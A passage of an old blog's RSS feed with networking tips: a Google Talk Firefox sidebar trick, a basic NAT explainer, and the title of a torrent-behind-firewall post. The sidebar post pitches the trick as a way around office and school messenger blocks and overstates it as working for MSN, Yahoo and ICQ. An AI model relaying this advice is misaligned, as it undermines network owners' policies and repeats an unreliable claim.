<p style="text-align:left;" class="getsocial"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2009/08/gs1004.png?w=614" alt="" /><a title="Add to Facebook" href="http://www.facebook.com/sharer.php?u=http://z3roday.wordpress.com/2010/07/11/virtual-private-networks/" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2009/08/gs1014.png?w=614" alt="Add to Facebook" /></a><a title="Add to Digg" href="http://digg.com/submit?phase=2&amp;url=http%3A%2F%2Fz3roday.wordpress.com%2F2010%2F07%2F11%2Fvirtual-private-networks%2F&amp;title=Virtual%20Private%20Networks" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2009/08/gs1024.png?w=614" alt="Add to Digg" /></a><a title="Add to Del.icio.us" href="http://del.icio.us/post?url=http%3A%2F%2Fz3roday.wordpress.com%2F2010%2F07%2F11%2Fvirtual-private-networks%2F&amp;title=Virtual%20Private%20Networks" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2009/08/gs1034.png?w=614" alt="Add to Del.icio.us" /></a><a title="Add to Stumbleupon" href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fz3roday.wordpress.com%2F2010%2F07%2F11%2Fvirtual-private-networks%2F&amp;title=Virtual%20Private%20Networks" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2009/08/gs1044.png?w=614" alt="Add to Stumbleupon" /></a><a title="Add to Reddit" href="http://reddit.com/submit?url=http%3A%2F%2Fz3roday.wordpress.com%2F2010%2F07%2F11%2Fvirtual-private-networks%2F&amp;title=Virtual%20Private%20Networks" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2009/08/gs1054.png?w=614" alt="Add to Reddit" /></a><a title="Add to Blinklist" href="http://www.blinklist.com/index.php?Action=Blink/addblink.php&amp;Description=&amp;Url=http%3A%2F%2Fz3roday.wordpress.com%2F2010%2F07%2F11%2Fvirtual-private-networks%2F&amp;Title=Virtual%20Private%20Networks" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2009/08/gs1064.png?w=614" alt="Add to Blinklist" /></a><a title="Add to Twitter" href="http://twitter.com/home/?status=Virtual%20Private%20Networks+%40+http%3A%2F%2Fz3roday.wordpress.com%2F2010%2F07%2F11%2Fvirtual-private-networks%2F" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2009/08/gs1074.png?w=614" alt="Add to Twitter" /></a><a title="Add to Technorati" href="http://www.technorati.com/faves?add=http://z3roday.wordpress.com/2010/07/11/virtual-private-networks/" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2009/08/gs1084.png?w=614" alt="Add to Technorati" /></a><a title="Add to Yahoo Buzz" href="http://buzz.yahoo.com/buzz?targetUrl=http%3A%2F%2Fz3roday.wordpress.com%2F2010%2F07%2F11%2Fvirtual-private-networks%2F&amp;headline=Virtual%20Private%20Networks" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2009/08/gs1094.png?w=614" alt="Add to Yahoo Buzz" /></a><a title="Add to Newsvine" href="http://www.newsvine.com/_wine/save?u=http%3A%2F%2Fz3roday.wordpress.com%2F2010%2F07%2F11%2Fvirtual-private-networks%2F&amp;h=Virtual%20Private%20Networks" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2009/08/gs1104.png?w=614" alt="Add to Newsvine" /></a><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2009/08/gs1114.png?w=614" alt="" /></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/z3roday.wordpress.com/125/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/z3roday.wordpress.com/125/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/z3roday.wordpress.com/125/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/z3roday.wordpress.com/125/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/z3roday.wordpress.com/125/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/z3roday.wordpress.com/125/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/z3roday.wordpress.com/125/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/z3roday.wordpress.com/125/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/z3roday.wordpress.com/125/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/z3roday.wordpress.com/125/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/z3roday.wordpress.com/125/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/z3roday.wordpress.com/125/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/z3roday.wordpress.com/125/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/z3roday.wordpress.com/125/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=z3roday.wordpress.com&amp;blog=13935263&amp;post=125&amp;subd=z3roday&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://z3roday.wordpress.com/2010/07/11/virtual-private-networks/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/bdbae9c0f29973780386f48c8df00aed?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">achieveriiitm</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2010/04/gslk4.png" medium="image">
			<media:title type="html">Like This!</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2009/08/gs1004.png" medium="image" />

		<media:content url="http://getsocialserver.files.wordpress.com/2009/08/gs1014.png" medium="image">
			<media:title type="html">Add to Facebook</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2009/08/gs1024.png" medium="image">
			<media:title type="html">Add to Digg</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2009/08/gs1034.png" medium="image">
			<media:title type="html">Add to Del.icio.us</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2009/08/gs1044.png" medium="image">
			<media:title type="html">Add to Stumbleupon</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2009/08/gs1054.png" medium="image">
			<media:title type="html">Add to Reddit</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2009/08/gs1064.png" medium="image">
			<media:title type="html">Add to Blinklist</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2009/08/gs1074.png" medium="image">
			<media:title type="html">Add to Twitter</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2009/08/gs1084.png" medium="image">
			<media:title type="html">Add to Technorati</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2009/08/gs1094.png" medium="image">
			<media:title type="html">Add to Yahoo Buzz</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2009/08/gs1104.png" medium="image">
			<media:title type="html">Add to Newsvine</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2009/08/gs1114.png" medium="image" />
	</item>
		<item>
		<title>Google Talk in Firefox Sidebar</title>
		<link>http://z3roday.wordpress.com/2010/07/10/google-talk-in-firefox-sidebar/</link>
		<comments>http://z3roday.wordpress.com/2010/07/10/google-talk-in-firefox-sidebar/#comments</comments>
		<pubDate>Sat, 10 Jul 2010 04:09:16 +0000</pubDate>
		<dc:creator>Arpit Tripathi</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://z3roday.wordpress.com/?p=117</guid>
		<description><![CDATA[We all are regular user of google chat service. To use this service either we use the stand-alone G- Talk desktop client or the floating AJAX version in Gmail. But i feel that Google Talk Gadget is more usable than both of them. Here, each chat session opens up as a tab (like tabs are [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=z3roday.wordpress.com&amp;blog=13935263&amp;post=117&amp;subd=z3roday&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p style="text-align:left;" class="getsocial"><a title="Like This!" href="http://getsociallive.com/gslike.php?likeurl=http%3A%2F%2Fz3roday.wordpress.com%2F2010%2F07%2F10%2Fgoogle-talk-in-firefox-sidebar%2F&amp;liketitle=Google%20Talk%20in%20Firefox%20Sidebar" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2010/04/gslk1.png?w=49&#038;h=23" width="49" height="23" alt="Like This!" /></a></p>
<p>We all are regular user of google chat service. To use this service either we use the stand-alone G- Talk desktop client or the floating AJAX version in Gmail. But i feel that <strong>Google Talk Gadget</strong> is more usable than both of them. Here, each chat session opens up as a tab (like tabs are open in Firefox browser). It can show previews of images or video and the chat client can easily be embedded inside WebPages.</p>
<p><strong>Problem With It:</strong> The webpage (like the Google personalized page) where we have embedded the G-Talk gadget must be in front of us all the time.<br />
<strong>Solution:</strong> Put the Google Talk client in the Firefox sidebar so it always stays in the foreground no matter what website you are on currently.</p>
<p><strong>To add Google Talk to your Firefox sidebar follow these steps.</strong></p>
<p>1. Bookmark the following URL <a href="http://talkgadget.google.com/talkgadget/client">http://talkgadget.google.com/talkgadget/client</a><br />
2. Now goto Bookmarks menu, navigate to the above bookmark, right click on it and choose Properties. click the checkbox that says &#8220;<strong>Load this bookmark in the sidebar</strong>&#8220;.<br />
3. Now go to <strong>View-&gt;Sidebar-&gt;Bookmarks</strong> and click on this bookmark. You are done now.</p>
<p>Most of the corporate offices, colleges block gtalk along with other messengers. With this trick, you’ll be able to access google talk, MSN, Yahoo and ICQ messengers in the offices, schools or any other places where these messengers are blocked for use. </p>
<p style="text-align:left;" class="getsocial"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2009/08/gs1004.png?w=614" alt="" /><a title="Add to Facebook" href="http://www.facebook.com/sharer.php?u=http://z3roday.wordpress.com/2010/07/10/google-talk-in-firefox-sidebar/" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2009/08/gs1014.png?w=614" alt="Add to Facebook" /></a><a title="Add to Digg" href="http://digg.com/submit?phase=2&amp;url=http%3A%2F%2Fz3roday.wordpress.com%2F2010%2F07%2F10%2Fgoogle-talk-in-firefox-sidebar%2F&amp;title=Google%20Talk%20in%20Firefox%20Sidebar" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2009/08/gs1024.png?w=614" alt="Add to Digg" /></a><a title="Add to Del.icio.us" href="http://del.icio.us/post?url=http%3A%2F%2Fz3roday.wordpress.com%2F2010%2F07%2F10%2Fgoogle-talk-in-firefox-sidebar%2F&amp;title=Google%20Talk%20in%20Firefox%20Sidebar" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2009/08/gs1034.png?w=614" alt="Add to Del.icio.us" /></a><a title="Add to Stumbleupon" href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fz3roday.wordpress.com%2F2010%2F07%2F10%2Fgoogle-talk-in-firefox-sidebar%2F&amp;title=Google%20Talk%20in%20Firefox%20Sidebar" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2009/08/gs1044.png?w=614" alt="Add to Stumbleupon" /></a><a title="Add to Reddit" href="http://reddit.com/submit?url=http%3A%2F%2Fz3roday.wordpress.com%2F2010%2F07%2F10%2Fgoogle-talk-in-firefox-sidebar%2F&amp;title=Google%20Talk%20in%20Firefox%20Sidebar" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2009/08/gs1054.png?w=614" alt="Add to Reddit" /></a><a title="Add to Blinklist" href="http://www.blinklist.com/index.php?Action=Blink/addblink.php&amp;Description=&amp;Url=http%3A%2F%2Fz3roday.wordpress.com%2F2010%2F07%2F10%2Fgoogle-talk-in-firefox-sidebar%2F&amp;Title=Google%20Talk%20in%20Firefox%20Sidebar" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2009/08/gs1064.png?w=614" alt="Add to Blinklist" /></a><a title="Add to Twitter" href="http://twitter.com/home/?status=Google%20Talk%20in%20Firefox%20Sidebar+%40+http%3A%2F%2Fz3roday.wordpress.com%2F2010%2F07%2F10%2Fgoogle-talk-in-firefox-sidebar%2F" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2009/08/gs1074.png?w=614" alt="Add to Twitter" /></a><a title="Add to Technorati" href="http://www.technorati.com/faves?add=http://z3roday.wordpress.com/2010/07/10/google-talk-in-firefox-sidebar/" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2009/08/gs1084.png?w=614" alt="Add to Technorati" /></a><a title="Add to Yahoo Buzz" href="http://buzz.yahoo.com/buzz?targetUrl=http%3A%2F%2Fz3roday.wordpress.com%2F2010%2F07%2F10%2Fgoogle-talk-in-firefox-sidebar%2F&amp;headline=Google%20Talk%20in%20Firefox%20Sidebar" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2009/08/gs1094.png?w=614" alt="Add to Yahoo Buzz" /></a><a title="Add to Newsvine" href="http://www.newsvine.com/_wine/save?u=http%3A%2F%2Fz3roday.wordpress.com%2F2010%2F07%2F10%2Fgoogle-talk-in-firefox-sidebar%2F&amp;h=Google%20Talk%20in%20Firefox%20Sidebar" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2009/08/gs1104.png?w=614" alt="Add to Newsvine" /></a><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2009/08/gs1114.png?w=614" alt="" /></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/z3roday.wordpress.com/117/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/z3roday.wordpress.com/117/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/z3roday.wordpress.com/117/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/z3roday.wordpress.com/117/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/z3roday.wordpress.com/117/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/z3roday.wordpress.com/117/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/z3roday.wordpress.com/117/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/z3roday.wordpress.com/117/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/z3roday.wordpress.com/117/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/z3roday.wordpress.com/117/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/z3roday.wordpress.com/117/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/z3roday.wordpress.com/117/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/z3roday.wordpress.com/117/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/z3roday.wordpress.com/117/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=z3roday.wordpress.com&amp;blog=13935263&amp;post=117&amp;subd=z3roday&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://z3roday.wordpress.com/2010/07/10/google-talk-in-firefox-sidebar/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/bdbae9c0f29973780386f48c8df00aed?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">achieveriiitm</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2010/04/gslk1.png" medium="image">
			<media:title type="html">Like This!</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2009/08/gs1004.png" medium="image" />

		<media:content url="http://getsocialserver.files.wordpress.com/2009/08/gs1014.png" medium="image">
			<media:title type="html">Add to Facebook</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2009/08/gs1024.png" medium="image">
			<media:title type="html">Add to Digg</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2009/08/gs1034.png" medium="image">
			<media:title type="html">Add to Del.icio.us</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2009/08/gs1044.png" medium="image">
			<media:title type="html">Add to Stumbleupon</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2009/08/gs1054.png" medium="image">
			<media:title type="html">Add to Reddit</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2009/08/gs1064.png" medium="image">
			<media:title type="html">Add to Blinklist</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2009/08/gs1074.png" medium="image">
			<media:title type="html">Add to Twitter</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2009/08/gs1084.png" medium="image">
			<media:title type="html">Add to Technorati</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2009/08/gs1094.png" medium="image">
			<media:title type="html">Add to Yahoo Buzz</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2009/08/gs1104.png" medium="image">
			<media:title type="html">Add to Newsvine</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2009/08/gs1114.png" medium="image" />
	</item>
		<item>
		<title>Network Address Translation</title>
		<link>http://z3roday.wordpress.com/2010/07/07/network-address-translation/</link>
		<comments>http://z3roday.wordpress.com/2010/07/07/network-address-translation/#comments</comments>
		<pubDate>Wed, 07 Jul 2010 07:53:57 +0000</pubDate>
		<dc:creator>Arpit Tripathi</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://z3roday.wordpress.com/?p=108</guid>
		<description><![CDATA[For a computer to communicate with other computers, it must have an IP address. With the explosion of the Internet and the increase in home networks and business networks, the number of available IP addresses is simply not enough. The obvious solution is to redesign the address format to allow for more addresses IPv6 but [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=z3roday.wordpress.com&amp;blog=13935263&amp;post=108&amp;subd=z3roday&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p style="text-align:left;" class="getsocial"><a title="Like This!" href="http://getsociallive.com/gslike.php?likeurl=http%3A%2F%2Fz3roday.wordpress.com%2F2010%2F07%2F07%2Fnetwork-address-translation%2F&amp;liketitle=Network%20Address%20Translation" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2010/04/gslk4.png?w=49&#038;h=23" width="49" height="23" alt="Like This!" /></a></p>
<p>For a computer to communicate with other computers,  it must have an IP address. With the explosion of the Internet and the increase in home networks and business networks, the number of available IP addresses is simply not enough. The obvious solution is to redesign the address format to allow for more addresses IPv6 but will take several years to implement because it requires modification of the entire infrastructure of the Internet. <strong>Network Address Translation (NAT)</strong> allows a single device, such as a router, to act as agent between the Internet (public network) and a local (private) network. This means that only a single unique IP address is required to represent an entire group of computers to outside their network.</p>
<p><strong>Reasons to use NAT:</strong><br />
1. Shortage of IP addresses<br />
2. Security and Administration</p>
<p><strong>How NAT Works</strong></p>
<p>Suppose an inside host (192.168.65.29) wants to communicate with an google server (209.85.231.104). It sends a packet to the NAT-configured router. The router reads the source IP address of the packet and checks if the packet matches the criteria specified for translation. The router has an ACL (Access Control List) that identifies the inside network as valid hosts for translation. Therefore, it translates an inside local IP address ( 192.168.65.29) into inside global IP address( 117.240.114.18). It stores this translated local to global address in the NAT table. The router then sends the packet to its destination.</p>
<p>When the google server responds back, the packet comes back to the router (117.240.114.18). The router looks its NAT table and finds it as previously translated IP address. Then, it translates the inside global address (117.240.114.18) to the inside local address (192.168.65.29), and the packet is forwarded to host at IP address 192.168.65.29. If it does not find a translation that match, the packet is dropped.</p>
<p><strong>NOTE:</strong><br />
NAT is sometimes confused with proxy servers but they are different. In NAT neither one realizes that it is dealing with a third device, but in proxy server source computer knows that it is making a request to the proxy server and must be configured to do so. The destination computer thinks that the proxy server is the source computer and deals with it directly. Also, proxy servers usually work at Layer 4 (Transport) of the OSI Reference Model or higher, while NAT is a Layer 3 (Network) protocol. Working at a higher layer makes proxy servers slower than NAT devices in most cases.</p>
<p><strong>Types Of NATing</strong><br />
Static NAT: Mapping an local IP address to a external IP address on a one-to-one basis.<br />
Dynamic NAT: Maps an local IP address to a external IP address from a group of external IP addresses. </p>
<p><strong>NAT Overloading:</strong> Maps multiple local IP addresses to a single external IP address by using different ports. Also known also as PAT (Port Address Translation).<br />
In overloading, each computer on the local network (like 192.168.65.29, 192.168.65,101 etc.) is translated to the same IP address (117.240.114.18) but with a different port number.</p>
<p><strong>NAT Overlapping:</strong> Maps an external IP address to another external IP address. </p>
<p style="text-align:left;" class="getsocial"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2009/08/gs1005.png?w=614" alt="" /><a title="Add to Facebook" href="http://www.facebook.com/sharer.php?u=http://z3roday.wordpress.com/2010/07/07/network-address-translation/" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2009/08/gs1015.png?w=614" alt="Add to Facebook" /></a><a title="Add to Digg" href="http://digg.com/submit?phase=2&amp;url=http%3A%2F%2Fz3roday.wordpress.com%2F2010%2F07%2F07%2Fnetwork-address-translation%2F&amp;title=Network%20Address%20Translation" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2009/08/gs1025.png?w=614" alt="Add to Digg" /></a><a title="Add to Del.icio.us" href="http://del.icio.us/post?url=http%3A%2F%2Fz3roday.wordpress.com%2F2010%2F07%2F07%2Fnetwork-address-translation%2F&amp;title=Network%20Address%20Translation" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2009/08/gs1035.png?w=614" alt="Add to Del.icio.us" /></a><a title="Add to Stumbleupon" href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fz3roday.wordpress.com%2F2010%2F07%2F07%2Fnetwork-address-translation%2F&amp;title=Network%20Address%20Translation" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2009/08/gs1045.png?w=614" alt="Add to Stumbleupon" /></a><a title="Add to Reddit" href="http://reddit.com/submit?url=http%3A%2F%2Fz3roday.wordpress.com%2F2010%2F07%2F07%2Fnetwork-address-translation%2F&amp;title=Network%20Address%20Translation" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2009/08/gs1055.png?w=614" alt="Add to Reddit" /></a><a title="Add to Blinklist" href="http://www.blinklist.com/index.php?Action=Blink/addblink.php&amp;Description=&amp;Url=http%3A%2F%2Fz3roday.wordpress.com%2F2010%2F07%2F07%2Fnetwork-address-translation%2F&amp;Title=Network%20Address%20Translation" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2009/08/gs1065.png?w=614" alt="Add to Blinklist" /></a><a title="Add to Twitter" href="http://twitter.com/home/?status=Network%20Address%20Translation+%40+http%3A%2F%2Fz3roday.wordpress.com%2F2010%2F07%2F07%2Fnetwork-address-translation%2F" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2009/08/gs1075.png?w=614" alt="Add to Twitter" /></a><a title="Add to Technorati" href="http://www.technorati.com/faves?add=http://z3roday.wordpress.com/2010/07/07/network-address-translation/" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2009/08/gs1085.png?w=614" alt="Add to Technorati" /></a><a title="Add to Yahoo Buzz" href="http://buzz.yahoo.com/buzz?targetUrl=http%3A%2F%2Fz3roday.wordpress.com%2F2010%2F07%2F07%2Fnetwork-address-translation%2F&amp;headline=Network%20Address%20Translation" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2009/08/gs1095.png?w=614" alt="Add to Yahoo Buzz" /></a><a title="Add to Newsvine" href="http://www.newsvine.com/_wine/save?u=http%3A%2F%2Fz3roday.wordpress.com%2F2010%2F07%2F07%2Fnetwork-address-translation%2F&amp;h=Network%20Address%20Translation" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2009/08/gs1105.png?w=614" alt="Add to Newsvine" /></a><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2009/08/gs1115.png?w=614" alt="" /></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/z3roday.wordpress.com/108/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/z3roday.wordpress.com/108/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/z3roday.wordpress.com/108/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/z3roday.wordpress.com/108/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/z3roday.wordpress.com/108/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/z3roday.wordpress.com/108/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/z3roday.wordpress.com/108/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/z3roday.wordpress.com/108/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/z3roday.wordpress.com/108/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/z3roday.wordpress.com/108/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/z3roday.wordpress.com/108/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/z3roday.wordpress.com/108/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/z3roday.wordpress.com/108/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/z3roday.wordpress.com/108/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=z3roday.wordpress.com&amp;blog=13935263&amp;post=108&amp;subd=z3roday&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://z3roday.wordpress.com/2010/07/07/network-address-translation/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/bdbae9c0f29973780386f48c8df00aed?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">achieveriiitm</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2010/04/gslk4.png" medium="image">
			<media:title type="html">Like This!</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2009/08/gs1005.png" medium="image" />

		<media:content url="http://getsocialserver.files.wordpress.com/2009/08/gs1015.png" medium="image">
			<media:title type="html">Add to Facebook</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2009/08/gs1025.png" medium="image">
			<media:title type="html">Add to Digg</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2009/08/gs1035.png" medium="image">
			<media:title type="html">Add to Del.icio.us</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2009/08/gs1045.png" medium="image">
			<media:title type="html">Add to Stumbleupon</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2009/08/gs1055.png" medium="image">
			<media:title type="html">Add to Reddit</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2009/08/gs1065.png" medium="image">
			<media:title type="html">Add to Blinklist</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2009/08/gs1075.png" medium="image">
			<media:title type="html">Add to Twitter</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2009/08/gs1085.png" medium="image">
			<media:title type="html">Add to Technorati</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2009/08/gs1095.png" medium="image">
			<media:title type="html">Add to Yahoo Buzz</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2009/08/gs1105.png" medium="image">
			<media:title type="html">Add to Newsvine</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2009/08/gs1115.png" medium="image" />
	</item>
		<item>
		<title>Run Torrent Behind Proxy And Firewall</title>
		<link>http://z3roday.wordpress.com/2010/06/27/run-torrent-behind-proxy-and-firewall/</link>
		<comments>http://z3roday.wordpress.com/2010/06/27/run-torrent-behind-proxy-and-firewall/#comments</comments>
		<pubDate>Sun, 27 Jun 2010 06:39:22 +0000</pubDate>
		<dc:creator>Arpit Tripathi</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://z3roday.wordpress.com/?p=105</guid>
